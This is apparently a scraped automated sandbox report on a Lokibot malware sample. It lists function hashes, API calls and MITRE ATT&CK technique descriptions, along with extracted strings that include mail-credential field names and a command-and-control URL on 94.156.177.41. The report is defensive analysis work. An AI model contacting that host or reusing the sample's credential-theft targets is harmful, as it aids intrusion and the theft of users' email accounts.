Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

SmtpAccount, xrefs: 0040D0FA
SmtpPassword, xrefs: 0040D117
Technology, xrefs: 0040D08D
PopPassword, xrefs: 0040D0D0
SmtpPort, xrefs: 0040D0EB
SmtpServer, xrefs: 0040D0DC
PopServer, xrefs: 0040D099
PopPort, xrefs: 0040D0A7
PopAccount, xrefs: 0040D0B6
EmailAddress, xrefs: 0040D074

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 004036F2 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

94.156.177.41/simple/five/fre.php, xrefs: 004A001B, 004A0032

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID:
String ID: 94.156.177.41/simple/five/fre.php
API String ID: 0-2274625065
Opcode ID: 63f025d4664fbb271158e577aad787fa225bfab02102f215cc5e2ce5b7102035
Instruction ID: a50a5f0329aa3bfe82f98588002e05078d35de0dbdea340faab09d79a53c7e1b
Opcode Fuzzy Hash: 63f025d4664fbb271158e577aad787fa225bfab02102f215cc5e2ce5b7102035
Instruction Fuzzy Hash: BBF0F462D491A47ADB301D565C00FB3FEA98B9B7B0F14312AB98877241C269CD41C29C

Function 0040549C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58

Function 004029D4 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0yWVteGq5T.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\21c8026919fd094ab07ec3c180a9f210_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
0yWVteGq5T.exe

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON